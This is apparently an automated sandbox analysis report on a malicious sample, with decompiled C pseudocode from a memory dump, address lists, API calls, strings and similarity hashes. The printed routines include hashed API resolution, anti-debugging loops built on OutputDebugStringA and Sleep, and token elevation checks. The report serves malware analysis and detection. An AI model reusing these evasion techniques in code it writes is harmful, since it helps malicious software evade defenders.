											__eflags =  *((char*)(_t562 + 0x10));
											if( *((char*)(_t562 + 0x10)) != 0) {
												E008BBE30(_t562 + 0xc, _t537);
											}
											__eflags = 0;
											E008A8CA0(_t562);
											_t539 = _t562 + 0x1a0;
											_t552 = _t562 + 0x2c;
											while(1) {
												E008A0B70(_t539, 0, 0x44);
												 *((intOrPtr*)(_t562 + 0x1ac)) = 0x44;
												E008A0B70(_t552, 0, 0x10);
												_t562 = _t562 + 0x18;
												E008A8810(_t562 + 0x4c, 0);
												_t295 = E008A96D0(E008A96D0(E008B0220(_t562 + 0x50,  *((intOrPtr*)(_t562 + 0x40)), 0), 0x20), 0x22);
												_t296 =  *0x8cb1d0; // 0x3277c8
												E008A96D0(E008B0220(_t295,  *_t296, 0), 0x22);
												_t299 = E008A15C0(0xa1310f65, 0x643f303c);
												__eflags = _t299;
												if(_t299 != 0) {
													break;
												}
												E008A8CA0(_t562 + 0x48);
											}
											_push(_t552);
											_push(_t539);
											_push(0);
											_push(0);
											_push(4);
											_push(0);
											_push(0);
											_push(0);
											_push( *((intOrPtr*)(_t562 + 0x68)));
											_push( *((intOrPtr*)(_t562 + 0x60)));
											asm("int3");
											return _t299;
										}
									}
								}
							} else {
								E008B8910(_t562 + 0x130, _t533, _t537);
								E008A8CA0(_t562 + 0x110);
								E008A8CA0(_t562 + 0x108);
								E008A7A70(_t562 + 0x128);
								__eflags = 0;
								return 0;
							}
						} else {
							_push(0x8cb1cc);
							_push(0);
							asm("int3");
							return _t186;
						}
					} else {
						asm("int3");
						return _t184;
					}
				} else {
					asm("int3");
					return _t173;
				}
				L145:
			}

0x00895150
0x00895151
0x00895154
0x0089515a
0x00895163
0x00895172
0x00895179
0x0089517f
0x00895184
0x00895189
0x0089518e
0x00895193
0x0089519f
0x008951a1
0x008951b7
0x008951bc
0x008951bc
0x008951be
0x008951c5
0x008951c5
0x008951d0
0x008951dc
0x008951e4
0x008951ec
0x008951f1
0x008951f2
0x008951f8
0x00000000
0x00000000
0x00000000
0x00000000
0x008951fa
0x008951fa
0x008951fa
0x00895200
0x00000000
0x00000000
0x00895202
0x00895203
0x00895209
0x00000000
0x0089520b
0x00895212
0x00895212
0x00000000
0x00895209
0x008951fa
0x00895218
0x00895218
0x00895218
0x0089521a
0x00895221
0x00895221
0x0089522c
0x00895238
0x00895240
0x00895248
0x0089524d
0x0089524e
0x00895254
0x00000000
0x00000000
0x00000000
0x00000000
0x00895256
0x00895256
0x00895256
0x0089525c
0x00000000
0x00000000
0x0089525e
0x0089525f
0x00895265
0x00000000
0x00895267
0x0089526e
0x0089526e
0x00000000
0x00895265
0x00895256
0x00895274
0x00895274
0x00895274
0x00895276
0x0089527d
0x0089527d
0x00895288
0x00895294
0x0089529c
0x008952a4
0x008952a9
0x008952aa
0x008952b0
0x00000000
0x00000000
0x00000000
0x00000000
0x008952b2
0x008952b2
0x008952b2
0x008952b8
0x00000000
0x00000000
0x008952ba
0x008952bb
0x008952c1
0x00000000
0x008952c3
0x008952ca
0x008952ca
0x00000000
0x008952c1
0x008952b2
0x008952d0
0x008952d0
0x008952d0
0x008952d2
0x008952d9
0x008952d9
0x008952e4
0x008952f0
0x008952f8
0x00895300
0x00895305
0x00895306
0x0089530c
0x00000000
0x00000000
0x00000000
0x00000000
0x0089530e
0x0089530e
0x0089530e
0x00895314
0x00000000
0x00000000
0x00895316
0x00895317
0x0089531d
0x00000000
0x0089531f
0x00895326
0x00895326
0x00000000
0x0089531d
0x0089530e
0x0089532c
0x00895333
0x00895333
0x00895338
0x0089533d
0x00895342
0x00895344
0x00895350
0x00895355
0x00895358
0x00895efb
0x00895efb
0x00895f04
0x00895f06
0x00895f08
0x00895f22
0x00895f22
0x00895f2f
0x00895f34
0x00895f3b
0x00895f43
0x00895f4a
0x00895f4e
0x00895f52
0x00895f52
0x00895f54
0x00895f61
0x00895f67
0x00895f69
0x00895f6b
0x00000000
0x00000000
0x00895f75
0x00895f7f
0x00895f8a
0x00895f8c
0x00895f97
0x00895f97
0x00895fa9
0x00895fab
0x00895fad
0x00895fbd
0x00895fd0
0x00895fd0
0x00895fe1
0x00895fe4
0x00895fec
0x00895fee
0x00895ff0
0x00895ffd
0x00896017
0x00896017
0x00895ff0
0x00000000
0x00895f0a
0x00895f18
0x00895f1a
0x00895f1c
0x00000000
0x00000000
0x00000000
0x00000000
0x00895f1c
0x00000000
0x00895f08
0x00895358
0x0089535e
0x0089535e
0x00895368
0x0089536f
0x00895377
0x0089538a
0x0089539b
0x0089539d
0x0089539f
0x008953aa
0x008953aa
0x008953ac
0x008953ae
0x008953b0
0x008953ba
0x008953cb
0x008953cd
0x008953cf
0x008953cf
0x008953d4
0x008953d7
0x008953d7
0x008953ba
0x008953e2
0x008953f0
0x008953fc
0x0089540b
0x00895410
0x00895412
0x0089541c
0x00895428
0x0089542d
0x0089542f
0x00895440
0x00895451
0x00895453
0x00895457
0x00895459
0x00895459
0x0089545e
0x0089546f
0x00895483
0x00895485
0x00895487
0x00895490
0x00895490
0x0089549c
0x0089549c
0x008954a5
0x008954b8
0x008954bd
0x008954bf
0x008954d9
0x008954ec
0x008954f1
0x008954f3
0x00895506
0x0089550b
0x0089551c
0x00895525
0x00895538
0x00895546
0x00895552
0x00895563
0x0089556a
0x00895576
0x00895589
0x00895590
0x00895599
0x00895599
0x00895599
0x0089559c
0x008954f5
0x008954f5
0x008954f5
0x008955a8
0x008955b4
0x008955b9
0x008955bb
0x008955c4
0x008955c4
0x00000000
0x00000000
0x00000000
0x008954c1
0x008954c8
0x008955bd
0x008955bd
0x008955bd
0x008955d2
0x008955e8
0x008955f4
0x008955f9
0x00895601
0x00895603
0x00895606
0x00895608
0x0089560f
0x0089560f
0x00895619
0x00895620
0x00895622
0x0089562e
0x0089562e
0x00895630
0x00895637
0x00895637
0x00895637
0x00895638
0x0089563a
0x00000000
0x00000000
0x0089563c
0x0089563f
0x00000000
0x00895641
0x00895641
0x00895648
0x0089564b
0x00000000
0x0089564d
0x0089560f
0x0089560f
0x00895619
0x00895620
0x00895622
0x0089562e
0x0089562e
0x00895630
0x00000000
0x00895630
0x0089560f
0x0089564b
0x00000000
0x0089563f
0x0089564f
0x00000000
0x0089564f
0x0089560f
0x00895652
0x00895652
0x00895656
0x0089569c
0x0089569e
0x008956ab
0x008956ad
0x008956b3
0x008956ba
0x008956c0
0x008956c5
0x008956c8
0x008956cb
0x008956ce
0x008956de
0x008956e3
0x008956e8
0x008956f7
0x00895700
0x00895705
0x00895707
0x00895724
0x00895729
0x0089572f
0x0089572f
0x00895738
0x0089573d
0x0089573d
0x0089573f
0x0089574b
0x0089574d
0x00000000
0x00000000
0x00895754
0x00895759
0x0089575a
0x0089575d
0x00000000
0x00000000
0x00000000
0x0089575d
0x0089575f
0x00895766
0x00895770
0x00895783
0x0089578a
0x0089579b
0x0089579b
0x00895709
0x00895709
0x0089570e
0x00895714
0x00895714
0x0089571d
0x0089571d
0x008957a6
0x008957a6
0x008956ce
0x008956ba
0x008956ad
0x008957b2
0x008957b5
0x00895b3c
0x00895b3c
0x00895b41
0x00895b43
0x00895b54
0x00895b54
0x00895b59
0x00895b5b
0x00895e33
0x00895e35
0x00895e3a
0x00895e3d
0x00895e3f
0x00895e47
0x00895e49
0x00895e41
0x00895e41
0x00895e41
0x00895e4e
0x00895e4e
0x00895b61
0x00895b6e
0x00895b71
0x00895e0b
0x00895e10
0x00895e1a
0x00895e21
0x00895e22
0x00895e29
0x00895b77
0x00895b86
0x00895b86
0x00895b45
0x00895b45
0x00895b4b
0x00895b50
0x00895b52
0x00000000
0x00000000
0x00895b52
0x00895b92
0x00895b97
0x00895b99
0x00895baa
0x00895baa
0x00895baf
0x00895bb1
0x00895eb0
0x00895eb2
0x00895eb7
0x00895eba
0x00895ebc
0x00895ec4
0x00895ec6
0x00895ebe
0x00895ebe
0x00895ebe
0x00895ecb
0x00895ecb
0x00895bb7
0x00895bc4
0x00895bc7
0x00895e62
0x00895e68
0x00895e73
0x00895e74
0x00895e7d
0x00895e84
0x00895e89
0x00895e8b
0x00895e93
0x00895e9e
0x00895ea6
0x00895ea6
0x00895bcd
0x00895bcf
0x00895be8
0x00895bf1
0x00895bf5
0x00895bf7
0x00895c05
0x00895c06
0x00895c12
0x00895c12
0x00895b9b
0x00895b9b
0x00895ba1
0x00895ba6
0x00895ba8
0x00000000
0x00000000
0x00895ba8
0x00895c1e
0x00895c21
0x00895c24
0x00895d87
0x00895d8e
0x00895ed5
0x00895ee4
0x00895ee4
0x00895d94
0x00895d9c
0x00895daa
0x00895dbd
0x00895dc4
0x00895dc9
0x00895c2a
0x00895c2a
0x00895c2d
0x00895cf0
0x00895cf3
0x00895cfb
0x00895d02
0x00895d04
0x00895d07
0x00895d0a
0x00895d0d
0x00895d1b
0x00895d25
0x00895d2a
0x00895d32
0x00895d34
0x00895d34
0x00895d36
0x00895d3e
0x00895d43
0x00895d47
0x00895d4f
0x00895d58
0x00895d58
0x00895d5d
0x00895d5e
0x00895d5e
0x00895d36
0x00895d6e
0x00895d73
0x00895d7a
0x00895d7c
0x00895d80
0x00895d80
0x00895d7c
0x00895c33
0x00895c33
0x00895c35
0x00895c3b
0x00895c42
0x00895c58
0x00895c5a
0x00895c5e
0x00895c60
0x00895c63
0x00895c66
0x00895c69
0x00895c77
0x00895c81
0x00895c8d
0x00895c8f
0x00895c96
0x00895c9b
0x00895ca0
0x00895ca2
0x00895ca2
0x00895ca4
0x00895ca9
0x00895cae
0x00895cb2
0x00895cba
0x00895cc3
0x00895cc3
0x00895cc8
0x00895cc9
0x00895cc9
0x00895ca4
0x00895ca0
0x00895cd3
0x00895cd8
0x00895cdc
0x00895cde
0x00895ce6
0x00895ce6
0x00895c44
0x00895c44
0x00895c4f
0x00895c52
0x00000000
0x00000000
0x00895c52
0x00895c42
0x00895c35
0x00895c2d
0x00895dd5
0x00895de1
0x00895ded
0x00895df9
0x00895dfe
0x00895e0a
0x008957bb
0x008957c2
0x008957c4
0x00000000
0x008957ca
0x008957ca
0x008957cc
0x00000000
0x008957d2
0x008957dc
0x008957e4
0x008957e7
0x008957f5
0x00895809
0x0089580b
0x0089580d
0x00895813
0x00895813
0x0089581a
0x00895821
0x00895821
0x00895823
0x00895828
0x00895834
0x00895844
0x00895849
0x0089584e
0x00895854
0x00895854
0x00895859
0x0089585e
0x00895863
0x0089586a
0x0089586e
0x00895873
0x00895878
0x00895888
0x0089588d
0x00895896
0x008958b7
0x008958be
0x008958d0
0x008958df
0x008958e4
0x008958e6
0x00000000
0x00000000
0x00895996
0x00895996
0x008958ec
0x008958ed
0x008958ee
0x008958ef
0x008958f0
0x008958f2
0x008958f3
0x008958f4
0x008958f5
0x008958f9
0x008958fd
0x008958fe
0x008958fe
0x008957cc
0x008957c4
0x00895658
0x0089565f
0x0089566b
0x00895677
0x00895683
0x00895688
0x00895694
0x00895694
0x00895431
0x00895431
0x00895436
0x00895437
0x00895438
0x00895438
0x00895414
0x00895414
0x00895415
0x00895415
0x0089517b
0x0089517b
0x0089517c
0x0089517c
0x00000000

APIs

OutputDebugStringA.KERNEL32(?,00000014,00000050,00000028,00000064,A1310F65,755128FE,00000001), ref: 008951DC
Sleep.KERNEL32(0000000A), ref: 008951E4
OutputDebugStringA.KERNEL32(?), ref: 00895212
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 00895238
Sleep.KERNEL32(0000000A), ref: 00895240
OutputDebugStringA.KERNEL32(?), ref: 0089526E
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 00895294
Sleep.KERNEL32(0000000A), ref: 0089529C
OutputDebugStringA.KERNEL32(?), ref: 008952CA
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 008952F0
Sleep.KERNEL32(0000000A), ref: 008952F8

Strings

, xrefs: 008957DC
D, xrefs: 00895878
!, xrefs: 008953FC
@, xrefs: 00895F8C

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID: DebugOutputString$Sleep
String ID: $ !$@$D
API String ID: 3789842296-553107503
Opcode ID: dd890cc1222e647d59c702dd69c643eb48f719104fa8d68466e9a566c16f506d
Instruction ID: d3daffcb15e5d8a2b50444d53b7f7dfbcda0cfa7f9ba7b4a759c81420dcf4853
Opcode Fuzzy Hash: dd890cc1222e647d59c702dd69c643eb48f719104fa8d68466e9a566c16f506d
Instruction Fuzzy Hash: 426292306047459AEB25BB68CCA2BEF77E5FF81340F48442DE586D6292EF709905CB63

Uniqueness

Uniqueness Score: -1.00%

Function 008A3930, Relevance: 6.8, APIs: 4, Instructions: 834
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E008A3930(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v32;
				intOrPtr _v36;
				char _v44;
				void* _v60;
				void* _v72;
				char _v76;
				char _v84;
				void* _v88;
				char _v92;
				void* _v96;
				long _v100;
				long _v104;
				long _v108;
				char _v112;
				void* _v116;
				char _v120;
				void* _v154;
				struct _SYSTEM_INFO _v156;
				signed int _v160;
				void* _v164;
				char _v168;
				void* _v172;
				char _v176;
				char _v180;
				void* _v184;
				char _v188;
				void* _v196;
				intOrPtr _v424;
				signed char _v428;
				signed char _v432;
				char _v496;
				void* _v500;
				void* _v504;
				char _v520;
				void* _v524;
				intOrPtr _t163;
				intOrPtr _t174;
				char _t175;
				intOrPtr* _t183;
				void* _t187;
				void* _t197;
				signed int _t201;
				char _t212;
				intOrPtr _t219;
				intOrPtr _t223;
				void* _t229;
				int _t234;
				intOrPtr _t241;
				void* _t244;
				void* _t247;
				void* _t255;
				void* _t263;
				void* _t264;
				int _t275;
				void* _t279;
				void* _t282;
				void* _t283;
				void* _t286;
				void* _t289;
				void* _t292;
				void* _t295;
				void* _t298;
				void* _t306;
				intOrPtr _t308;
				void* _t311;
				void* _t313;
				void* _t314;
				intOrPtr _t315;
				void* _t316;
				signed char _t322;
				intOrPtr* _t344;
				void** _t346;
				void* _t354;
				void* _t359;
				void* _t360;
				void* _t362;
				void* _t364;
				intOrPtr _t366;
				void* _t367;
				void* _t368;
				void* _t374;
				void* _t375;
				void* _t377;
				signed char _t378;
				void* _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				void* _t384;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t392;
				intOrPtr _t394;
				void* _t395;
				intOrPtr _t398;
				intOrPtr _t400;
				intOrPtr* _t402;
				void* _t403;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t411;
				intOrPtr* _t413;
				signed char* _t416;
				intOrPtr* _t417;
				void* _t420;
				void* _t425;
				signed int _t429;
				void* _t432;
				void* _t433;
				void* _t434;
				signed int _t439;
				signed int _t442;
				void* _t444;
				intOrPtr* _t445;

				_t439 = _t442;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t444 = (_t442 & 0xfffffff0) - 0x1b4;
				_t313 = __ecx;
				_t163 =  *0x8cb1f0; // 0xee59a0
				if(_t163 == 0x9ccb2c38) {
					_push(0x30);
					_t163 = E008A1030();
					_t444 = _t444 + 4;
					 *0x8cb1f0 = _t163;
				}
				if( *((char*)(_t163 + 0xb)) == 0 || _t313 != 0) {
					_t416 =  &_v432;
					E008A0B70(_t416, 0, 0x11c);
					_t445 = _t444 + 0xc;
					_t377 =  *0x8cb1f4; // 0xec1568
					_v432 = 0x11c;
					if(_t377 == 0xc139578) {
						 *0x8cb1f4 = 0;
						_t314 = 0;
						goto L11;
					} else {
						if(_t377 == 0) {
							_t314 = 0;
							goto L11;
						} else {
							_t314 = 0;
							do {
								_t375 = _t314;
								_t311 = _t375;
								while( *((intOrPtr*)(_t311 + _t377 + 8)) != 0x13e99f60) {
									_t375 = _t375 + 1;
									_t311 = _t311 + 0x18;
									if(_t375 < 0x10) {
										continue;
									} else {
										goto L10;
									}
									goto L236;
								}
								_t308 =  *((intOrPtr*)(_t311 + _t377 + 0x14));
								if(_t308 != 0) {
									L14:
									if(_t308 == 0) {
										L16:
										_t417 =  *0x8cb1f0; // 0xee59a0
										_t378 = _v432;
										_t322 = _v428;
										 *((intOrPtr*)(_t417 + 4)) = _v424;
										_t428 = (_t378 & 0x000000ff) << 4;
										 *(_t417 + 9) = _t322;
										 *(_t417 + 8) = _t378;
										 *((char*)(_t417 + 0xa)) = _v160 & 0x0000ffff;
										_t380 =  !=  ? 1 : _t314;
										 *((char*)(_t417 + 0xc)) =  !=  ? 1 : _t314;
										_t381 =  *0x8cb1f4; // 0xec1568
										_v32 = _t314;
										 *_t417 = (_t322 & 0x000000ff) + ((_t378 & 0x000000ff) << 4) - 0x50;
										if(_t381 == 0xc139578) {
											 *0x8cb1f4 = 0;
											goto L22;
										} else {
											if(_t381 == 0) {
												L22:
												_push(0xa1310f65);
												_t428 = E008A7564(0xa1310f65);
												if(_t428 == 0) {
													if(E008A6C50(0xa1310f65) != 0) {
														_push(0xa1310f65);
														_t428 = E008A7564(0xa1310f65);
													}
												}
												if(_t428 != 0) {
													_t445 = _t445 + 0xfffffff8;
													_t413 = E008A67C8(_t428, 0x16ea6870);
													goto L25;
												}
											} else {
												do {
													_t374 = _t314;
													_t306 = _t374;
													while( *((intOrPtr*)(_t306 + _t381 + 8)) != 0x16ea6870) {
														_t374 = _t374 + 1;
														_t306 = _t306 + 0x18;
														if(_t374 < 0x10) {
															continue;
														} else {
															goto L21;
														}
														goto L27;
													}
													_t413 =  *((intOrPtr*)(_t306 + _t381 + 0x14));
													if(_t413 != 0) {
														L25:
														if(_t413 != 0) {
															 *_t413(0xffffffff,  &_v44);
														}
														goto L27;
													} else {
														goto L22;
													}
													goto L236;
													L21:
													asm("o16 nop [eax+eax]");
													_t381 =  *(_t381 + 0x180);
												} while (_t381 != 0);
												goto L22;
											}
										}
										L27:
										_t174 =  *0x8cb1f0; // 0xee59a0
										if(_v36 == 0) {
											 *((char*)(_t174 + 0xb)) = 0x20;
										} else {
											 *((char*)(_t174 + 0xb)) = 0x40;
										}
										_t175 = E008A47B0(_t314, _t417, _t428);
										_t382 =  *0x8cb1f0; // 0xee59a0
										 *((char*)(_t382 + 0x28)) = _t175;
										if( *((intOrPtr*)(E008A3930(_t314, 0, _t417, _t428))) >= 0x10) {
											asm("movups xmm0, [0x8ca130]");
											asm("movsd xmm1, [0x8ca140]");
											asm("movups [esp+0x130], xmm0");
											asm("movsd [esp+0x140], xmm1");
											_t418 =  &_v120;
											_push(0);
											E008B9350( &_v120);
											_t429 = _t314;
											do {
												E008B9670( &_v120, E008B9650( &_v120) + 4);
												_t315 =  *((intOrPtr*)(_t445 + 0x130 + _t429 * 4));
												_t183 = E008B9640(_t418, E008B9650(_t418) + 0xfffffffc);
												_t429 = 1 + _t429;
												 *_t183 = _t315;
											} while (_t429 < 6);
											_push(0);
											_t314 = 0;
											E008BC550(0,  &_v160, _t429, _t439, _t418, 0x80000002);
											E008B9510(_t418);
											E008BC580( &_v172, _t382,  &_v84, 0x1cd1a4f3);
											_push(_v92);
											_t187 = E008BC790( &_v180, _t382);
											_t419 = _t187;
											E008B0B10( &_v84);
											if(_t187 != 0) {
												E008BC580( &_v168, _t382,  &(_v156.lpMinimumApplicationAddress), 0xc28d248b);
												_push(_v156.dwOemId);
												_t419 = E008BC790( &_v176, _t382);
												E008B0B10( &(_v156.lpMinimumApplicationAddress));
												E008BC580( &_v180, _t382,  &(_v156.dwPageSize), 0xead58213);
												_push(_v160);
												_t432 = E008BC790( &_v188, _t382);
												E008B0B10( &_v164);
												if(_t419 != 0) {
													if(_t419 == 5) {
														if(_t432 == 0) {
															E008A8CA0( &_v164);
															if(_v168 != 0) {
																_t406 = _v172;
																if(_t406 == 0 || _t406 == 0xffffffff) {
																	_t283 = 1;
																} else {
																	_t283 = 0;
																}
																if(_t283 == 0) {
																	E008BBF00(_t406);
																}
															}
															_v172 = 0;
															_t197 = 3;
															goto L64;
														} else {
															if(_t432 == 1) {
																E008A8CA0( &_v164);
																if(_v168 != 0) {
																	_t407 = _v172;
																	if(_t407 == 0 || _t407 == 0xffffffff) {
																		_t286 = 1;
																	} else {
																		_t286 = 0;
																	}
																	if(_t286 == 0) {
																		E008BBF00(_t407);
																	}
																}
																_v172 = 0;
																_t197 = 4;
																goto L64;
															} else {
																goto L56;
															}
														}
														goto L236;
													} else {
														if(_t419 != 2 || _t432 != 1) {
															goto L56;
														} else {
															E008A8CA0( &_v164);
															if(_v168 != 0) {
																_t409 = _v172;
																if(_t409 == 0 || _t409 == 0xffffffff) {
																	_t292 = 1;
																} else {
																	_t292 = 0;
																}
																if(_t292 == 0) {
																	E008BBF00(_t409);
																}
															}
															_v172 = 0;
															_t197 = 5;
														}
													}
												} else {
													if(_t432 != 0) {
														L56:
														E008A8CA0( &_v164);
														if(_v168 != 0) {
															_t408 = _v172;
															if(_t408 == 0 || _t408 == 0xffffffff) {
																_t289 = 1;
															} else {
																_t289 = _t314;
															}
															if(_t289 == 0) {
																E008BBF00(_t408);
															}
														}
														_v172 = 0;
														_t197 = _t314;
													} else {
														E008A8CA0( &_v164);
														if(_v168 != 0) {
															_t410 = _v172;
															if(_t410 == 0 || _t410 == 0xffffffff) {
																_t295 = 1;
															} else {
																_t295 = 0;
															}
															if(_t295 == 0) {
																E008BBF00(_t410);
															}
														}
														_v172 = 0;
														_t197 = 2;
													}
												}
											} else {
												E008A8CA0( &_v156);
												if(_v160 != 0) {
													_t411 = _v164;
													if(_t411 == 0 || _t411 == 0xffffffff) {
														_t298 = 1;
													} else {
														_t298 = 0;
													}
													if(_t298 == 0) {
														E008BBF00(_t411);
													}
												}
												_v164 = 0;
												_t197 = 1;
											}
										} else {
											_t197 = 1;
										}
										L64:
										_t383 =  *0x8cb1f0; // 0xee59a0
										 *(_t445 + 0x1ac) = 0;
										 *(_t383 + 0x24) = _t197;
										_t384 =  *0x8cb1f4; // 0xec1568
										if(_t384 == 0xc139578) {
											 *0x8cb1f4 = 0;
											goto L70;
										} else {
											if(_t384 == 0) {
												L70:
												_push(0x3ab94787);
												_t432 = E008A7564(0x3ab94787);
												if(_t432 == 0) {
													if(E008A6C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t432 = E008A7564(0x3ab94787);
													}
												}
												if(_t432 == 0) {
													goto L87;
												} else {
													_t445 = _t445 + 0xfffffff8;
													_t402 = E008A67C8(_t432, 0xc17c5a6e);
													goto L73;
												}
											} else {
												do {
													_t368 = _t314;
													_t282 = _t368;
													while( *((intOrPtr*)(_t282 + _t384 + 8)) != 0xc17c5a6e) {
														_t368 = _t368 + 1;
														_t282 = _t282 + 0x18;
														if(_t368 < 0x10) {
															continue;
														} else {
															goto L69;
														}
														goto L88;
													}
													_t402 =  *((intOrPtr*)(_t282 + _t384 + 0x14));
													if(_t402 != 0) {
														L73:
														if(_t402 == 0) {
															L87:
															_t201 = _t314;
														} else {
															_push(_t445 + 0x1ac);
															_push(8);
															_push(0xffffffff);
															if( *_t402() == 0) {
																goto L87;
															} else {
																_t403 =  *0x8cb1f4; // 0xec1568
																if(_t403 == 0xc139578) {
																	 *0x8cb1f4 = 0;
																	goto L81;
																} else {
																	if(_t403 == 0) {
																		L81:
																		_push(0x3ab94787);
																		_t432 = E008A7564(0x3ab94787);
																		if(_t432 == 0) {
																			if(E008A6C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t432 = E008A7564(0x3ab94787);
																			}
																		}
																		if(_t432 == 0) {
																			goto L87;
																		} else {
																			_t445 = _t445 + 0xfffffff8;
																			_t366 = E008A67C8(_t432, 0x2eeff4c6);
																			goto L84;
																		}
																	} else {
																		do {
																			_t367 = _t314;
																			_t279 = _t367;
																			while( *((intOrPtr*)(_t279 + _t403 + 8)) != 0x2eeff4c6) {
																				_t367 = _t367 + 1;
																				_t279 = _t279 + 0x18;
																				if(_t367 < 0x10) {
																					continue;
																				} else {
																					goto L80;
																				}
																				goto L88;
																			}
																			_t366 =  *((intOrPtr*)(_t279 + _t403 + 0x14));
																			if(_t366 != 0) {
																				L84:
																				if(_t366 == 0) {
																					goto L87;
																				} else {
																					_t275 = GetTokenInformation(_v88, 0x14,  &_v100, 4,  &_v104); // executed
																					if(_t275 == 0) {
																						goto L87;
																					} else {
																						_t201 = _t314 & 0xffffff00 | _v104 > 0x00000000;
																					}
																				}
																			} else {
																				goto L81;
																			}
																			goto L88;
																			L80:
																			asm("o16 nop [eax+eax]");
																			_t403 =  *(_t403 + 0x180);
																		} while (_t403 != 0);
																		goto L81;
																	}
																}
															}
														}
													} else {
														goto L70;
													}
													goto L88;
													L69:
													asm("o16 nop [eax+eax]");
													_t384 =  *(_t384 + 0x180);
												} while (_t384 != 0);
												goto L70;
											}
										}
										L88:
										_t344 =  *0x8cb1f0; // 0xee59a0
										 *(_t344 + 0x29) = _t201;
										 *((intOrPtr*)(_t344 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
										if( *_t344 >= 0x10) {
											_t386 =  *0x8cb1f4; // 0xec1568
											 *(_t445 + 0x1a4) = 0;
											if(_t386 == 0xc139578) {
												 *0x8cb1f4 = 0;
												goto L100;
											} else {
												if(_t386 == 0) {
													L100:
													_push(0x3ab94787);
													_t432 = E008A7564(0x3ab94787);
													if(_t432 == 0) {
														if(E008A6C50(0x3ab94787) != 0) {
															_push(0x3ab94787);
															_t432 = E008A7564(0x3ab94787);
														}
													}
													if(_t432 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t386 = E008A67C8(_t432, 0xc17c5a6e);
														goto L103;
													}
												} else {
													do {
														_t364 = _t314;
														_t263 = _t364;
														while( *((intOrPtr*)(_t263 + _t386 + 8)) != 0xc17c5a6e) {
															_t364 = _t364 + 1;
															_t263 = _t263 + 0x18;
															if(_t364 < 0x10) {
																continue;
															} else {
																goto L99;
															}
															goto L105;
														}
														_t386 =  *(_t263 + _t386 + 0x14);
														if(_t386 != 0) {
															L103:
															if(_t386 != 0) {
																 *_t386(0xffffffff, 8,  &_v76);
															}
														} else {
															goto L100;
														}
														goto L105;
														L99:
														asm("o16 nop [eax+eax]");
														_t386 =  *(_t386 + 0x180);
													} while (_t386 != 0);
													goto L100;
												}
											}
											L105:
											_t346 =  &_v84;
											 *_t346 =  *(_t445 + 0x1a4);
											_t346[1] = 1;
											if(E008BBEA0(_t346, _t386, _t432) == 0) {
												_t387 =  *0x8cb1f4; // 0xec1568
												_v88 = 0;
												if(_t387 == 0xc139578) {
													 *0x8cb1f4 = 0;
													goto L114;
												} else {
													if(_t387 == 0) {
														L114:
														_push(0x3ab94787);
														_t432 = E008A7564(0x3ab94787);
														if(_t432 == 0) {
															if(E008A6C50(0x3ab94787) != 0) {
																_push(0x3ab94787);
																_t432 = E008A7564(0x3ab94787);
															}
														}
														if(_t432 != 0) {
															_t445 = _t445 + 0xfffffff8;
															_t398 = E008A67C8(_t432, 0x2eeff4c6);
															goto L117;
														}
													} else {
														do {
															_t362 = _t314;
															_t255 = _t362;
															while( *((intOrPtr*)(_t255 + _t387 + 8)) != 0x2eeff4c6) {
																_t362 = _t362 + 1;
																_t255 = _t255 + 0x18;
																if(_t362 < 0x10) {
																	continue;
																} else {
																	goto L113;
																}
																goto L119;
															}
															_t398 =  *((intOrPtr*)(_t255 + _t387 + 0x14));
															if(_t398 != 0) {
																L117:
																if(_t398 != 0) {
																	GetTokenInformation(_v96, 0x19, _t314, _t314,  &_v100); // executed
																}
															} else {
																goto L114;
															}
															goto L119;
															L113:
															asm("o16 nop [eax+eax]");
															_t387 =  *(_t387 + 0x180);
														} while (_t387 != 0);
														goto L114;
													}
												}
												L119:
												_t212 = _v92;
												if(_t212 != 0) {
													_push(_t212);
													E008B9350(_t445 + 8);
													_t433 = E008B9640(_t445 + 8, 0);
													_t388 =  *0x8cb1f4; // 0xec1568
													if(_t388 == 0xc139578) {
														 *0x8cb1f4 = 0;
														goto L160;
													} else {
														if(_t388 == 0) {
															L160:
															_push(0x3ab94787);
															_t420 = E008A7564(0x3ab94787);
															if(_t420 == 0) {
																if(E008A6C50(0x3ab94787) != 0) {
																	_push(0x3ab94787);
																	_t420 = E008A7564(0x3ab94787);
																}
															}
															if(_t420 == 0) {
																goto L178;
															} else {
																_t445 = _t445 + 0xfffffff8;
																_t394 = E008A67C8(_t420, 0x2eeff4c6);
																goto L163;
															}
														} else {
															do {
																_t360 = _t314;
																_t247 = _t360;
																while( *((intOrPtr*)(_t247 + _t388 + 8)) != 0x2eeff4c6) {
																	_t360 = _t360 + 1;
																	_t247 = _t247 + 0x18;
																	if(_t360 < 0x10) {
																		continue;
																	} else {
																		goto L159;
																	}
																	goto L236;
																}
																_t394 =  *((intOrPtr*)(_t247 + _t388 + 0x14));
																if(_t394 != 0) {
																	L163:
																	if(_t394 == 0) {
																		L178:
																		E008B9510( &_v496);
																		if(_v92 != 0) {
																			E008BBE30( &_v96, _t433);
																		}
																		goto L122;
																	} else {
																		_t234 = GetTokenInformation(_v104, 0x19, _t433, _v108,  &_v108); // executed
																		if(_t234 == 0) {
																			goto L178;
																		} else {
																			_t395 =  *0x8cb1f4; // 0xec1568
																			if(_t395 == 0xc139578) {
																				 *0x8cb1f4 = 0;
																				goto L171;
																			} else {
																				if(_t395 == 0) {
																					L171:
																					_push(0x3ab94787);
																					 *_t445 = E008A7564(0x3ab94787);
																					if( *_t445 == 0) {
																						if(E008A6C50(0x3ab94787) != 0) {
																							_push(0x3ab94787);
																							_v520 = E008A7564(0x3ab94787);
																						}
																					}
																					if( *_t445 == 0) {
																						goto L176;
																					} else {
																						_t445 = _t445 + 0xfffffff8;
																						_t241 = E008A67C8( *((intOrPtr*)(_t445 + 8)), 0x4e2f8db7);
